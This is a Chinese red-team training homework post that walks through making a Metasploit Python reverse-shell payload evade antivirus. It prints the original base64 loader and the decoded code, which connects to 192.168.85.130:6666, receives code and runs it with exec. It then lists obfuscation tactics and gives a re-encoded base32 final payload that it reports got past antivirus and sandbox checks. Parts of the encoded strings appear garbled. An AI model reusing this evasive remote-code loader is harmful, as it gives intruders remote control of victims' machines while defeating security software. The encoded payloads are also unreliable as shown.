红队作业 | MSF源码级别免杀实录
文章来源|MS08067 红队培训班 第4期
本文作者:学员A(红队培训班4期学员)
按老师要求尝试完成布置的作业如下:
对于msf生成的shellcode都是一样的。
所以从代码层面来讲来说,不论是什么语言的实现,最后的代码实现的逻辑都是一样的,由于对于java并不了解,但听懂了课堂代码的逻辑,就是先循环饶了了几次然后再建立连接小马拉大马,后参考了群里其他同学作业后得此下文!
因为自己有一定python基础 所以这里对python的源码免杀来进行浅显的分析:
首先我们msf生成一个python的马:
可以看到落地火绒报毒:
看下源码:
```exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1Cwujqvtdb1U97roatdKKrb8EUnzF27ZBFODUuMTMwJyw2NjY2KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK')[0]))```
所以payload是:
简单处理一下:
```import socket,zlib,base64,struct,timefor x in range(10):try:s=socket.socket(2,socket.SOCK_STREAM) s.connect(('192.168.85.130',6666)) break except:time.sleep(5) l=struct.unpack('>I',s.recv(4))[0]d=s.recv(l)while len(d)<l:d+=s.recv(l-len(d))exec(zlib.decompress(base64.b64decode(d)),{'s':s})```
简单分析一波:
import一些模块进行b64解码&utf-8解码,解码里面的base64然后执行,这里用到的就是__import__内置函数来进行引用
代码的大概意思就是
循环10次尝试建立socket连接,成功就连接成功传数据,最后break,异常就sleep(5)秒然后继续建立连接
后面的代码
涉及到网络编程,不太了解,暂时搁置,这阵子了解一下网络编程后再来看
这里的话我感觉也可以改一下编码,但是不知道能否实行
所以这里就是一个基础的msf-pyhton的payload
基本上就是编码了一下然后直接建立连接,那么这里的话免杀思路如下:
1.改一下编码方式,最直接的
2.把木马里面的函数用不同方式实现
3.在木马里加点费功能混淆一下
4.函数名啥了改改,”特征值得改一下“,一些可以改的参数就改成自己的
(就跟抄作业似的,最后实现的功能都是一样的,你抄了别人的,你不能全抄把,哪不合适,就改改呗,嗯,改改呗,让杀软老师以为你是自己写的,不是抄msf的就行了,就给你过了)
所以我们这里的话
(\t)这里是因为我懒得替换了 为了一会好整成一行 (手动狗头)
我就简单做了这种混淆,然后整合回一行,然后最外面的编码我们用base32
NFWXA33SOQQHG33DNNSXIIDBOMQHUMIKNFWXA33SOQQHU3DJMIQGC4ZAPIZAU2LNOBXXE5BAMJQXGZJWGQQGC4ZAPIZQU2LNOBXXE5BAON2HE5LDOQQGC4ZAPI2AU2LNOBXXE5BAORUW2ZJAMFZSA6RVBJTG64RAPIQGS3RAOJQW4Z3FFA2SSOQKBF2HE6J2BIEQS4Z5PIYS443PMNVWK5BIGIWHUMJOKNHUGS27KNKFERKBJUUQUCIJOMXGG33ONZSWG5BIFATTCLRRFYYS4MJHFQ3DMNRWFEUQUCIJMJZGKYLLBIEWK6DDMVYHIOQKBEEXUNJOONWGKZLQFA2SSCTMHV5DILTVNZYGCY38EL9PSypgsoxPWZ4B4azon5wN6H1DHhkZIKMQ6XGLTSMVRXMKDMFEFHO2DJNRSSA3DFNYUGIKJ4NQ5AUCLEFM6XGLTSMVRXMKDMFVWGK3RIMQUSSCTFPBSWGKD2GIXGIZLDN5WXA4TFONZSQ6RTFZRDMNDEMVRW6ZDFFBSCSKJMPMTXGJZ2ON6SSCQ=
最后的payload:
exec(__import__('base64').b32decode(__import__('codecs').getencoder('utf-8')('NFWXA33SOQQHG33DNNSXIIDBOMQHUMIKNFWXA33SOQQHU3DJMIQGC4ZAPIZAU2LNOBXXE5BAMJQXGZJWGQQGC4ZAPIZQU2LNOBXXE5BAON2HE5LDOQQGC4ZAPI2AU2LNOBXXE5BAORUW2ZJAMFZSA6RVBJTG64RAPIQGS3RAOJQW4Z3FFA2SSOQKBF2HE6J2BIEQS4Z5PIYS443PMNVWK5BIGIWHUMJOKNHUGS27KNKFERKBJUUQUCIJOMXGG33ONZSWG5BIFATTCLRRFYYS4MJHFQ3DMNRWFEUQUCIJMJZGKYLLBIEWK6DDMVYHIOQKBEEXUNJOONWGKZLQFA2SSCTMHV5DILTVNZYGCY35NaXQM3nBSKAhcm6NGzkUmZtT35gBhbqXIKMQ6XGLTSMVRXMKDMFEFHO2DJNRSSA3DFNYUGIKJ4NQ5AUCLEFM6XGLTSMVRXMKDMFVWGK3RIMQUSSCTFPBSWGKD2GIXGIZLDN5WXA4TFONZSQ6RTFZRDMNDEMVRW6ZDFFBSCSKJMPMTXGJZ2ON6SSCQ=')[0]))
设置好监听和载荷(这里payload一定要选对,因为我才接触msf不久,选错监听,老不上线,哭死)
木马成功上线
最后测试木马免杀效果
Good
然后给沙箱
其余的我就不测了,360大概率也过
最后总结:
经过这个实验吧,虽然也不是自己的思路,也算是鹦鹉学舌,但是最后总算是做出来了,免杀初体验挺好的,虽然很多概念都不清楚,但是初体验很好,多看文章多动手,继续努力!
咨询红队请联系小客服
扫描下方二维码加入星球学习
加入后邀请你进入内部微信群,内部微信群永久有效!
来和5000+位同学一起加入星球学习吧!
红队作业 | MSF源码级别免杀实录相关推荐
- gh0st3.6源码编译+++免杀教程
这里有4个教程 可以去看看 gh0st3.6编译教程 http://www.3800hk.com/donghua/f/24166.html vc++6.0对gh0st驱动免杀教程.rar htt ...
- 艰难的mimikatz源码编译免杀 Windows Defender
微信公众号:乌鸦安全 扫取二维码获取更多信息! 说明 本文周一的时候,工具就已经上传GitHub了,所以工具应该是已经失效了!!!仅供参考! 本文mimikatz源码编译未能免杀Windows Def ...
- 小红伞和NOD32基于源码的免杀经验总结
小红伞和NOD32的杀毒引擎是非常厉害的,尤其是他们的启发式杀毒,简直快把病毒木马逼到了绝路.由于需要,这两天我和CG(一个高手)对一个远控软件进行了小红伞和NOD32的免杀.一开始很自然的拿出CCL ...
- 红队作业 | 收集xxx.com域名的所有子域名
文章来源|MS08067 红队培训班 第5期 本文作者:AlexD(红队培训班5期学员) 按老师要求尝试完成布置的作业如下: 被动信息收集 0x01 利用DNS数据集收集子域 有很多第三方服务聚合了大 ...
- java计算机毕业设计在线作业管理系统源码+mysql数据库+系统+lw文档+部署
java计算机毕业设计在线作业管理系统源码+mysql数据库+系统+lw文档+部署 java计算机毕业设计在线作业管理系统源码+mysql数据库+系统+lw文档+部署 本源码技术栈: 项目架构:B/S ...
- 深度分析Java的ClassLoader机制(源码级别)
转载自 深度分析Java的ClassLoader机制(源码级别) Java中的所有类,必须被装载到jvm中才能运行,这个装载工作是由jvm中的类装载器完成的,类装载器所做的工作实质是把类文件从硬盘读取 ...
- uni-app开发:(源码级别)uni-badge样式修改(自定义插槽)
文章目录 uni-app开发:(源码级别)uni-badge样式修改(自定义插槽) 一.效果图需求说明: 二.源码 · 修改前后对比: 2.1. 修改前 2.2. 修改后 三.调用代码: 附件:uni ...
- 2022新JI卫云域名防红/防封程序源码+已去除授权
正文: 2022新JI卫云域名防红/防封程序源码+已去除授权,JI卫云防红系统,双重跳转,程序非常稳定,生成短链接均支持在QQ_微信内部直接强行打开,也是支持iOS端的. 功能: 程序: wwau.l ...
- 彩虹登录聚合中转API程序网站源码「免授权」
源码下载:彩虹登录聚合中转API程序网站源码「免授权」-小程序文档类资源-CSDN下载 彩虹聚合登录中转API是一个可以实现中转QQ.微信.支付宝.微博.百度等平台的快捷登录接口.有多应用管理.域名限 ...
最新文章
- 机器学习101:我们天天都在说的机器学习,究竟该怎么入门?
- 弹性服务器怎么上传文件,上传哪个文件夹弹性云服务器
- windows改变php版本
- 鸿蒙系统电视k歌,华为电视怎么k歌?看完两分钟快速开启K歌模式
- linux 动态执行cp,Linux常用命令之cp、mv、rm、cat、more、head、tail、ln命令讲解
- JdbcTemplate(操作数据库-添加功能)
- 易语言python1.1模块_易语言之编写模块与引入模块
- liunx 下的动态地址分配服务DHCP
- CCF201604-3 路径解析(解法二)(100分)(废除!!!)
- 拉普拉斯二阶锐化matlab,laplace(拉普拉斯)锐化matlab程序
- C语言输出素数表(1-100)前100个
- 易语言dchp服务器,易语言模拟DHCP报文源码
- Openwrt:icmpv6_send: no reply to icmp error
- vos3000 检测版本失败_超级兔子安装失败检测新版本失败等问题解决方法
- ue4 改变枢轴位置_在UE4引擎中做卡通描边的一点心得
- python实现支付宝
- Vmware VDI\桌面虚拟化\虚拟化技术\IT 管理
- IIS Nginx Apache Tomcat 中间件漏洞
- 三维空间控制器 Leap Motion/leap motion 3D 外置3D体感手控
- 定向网络攻击分析与防御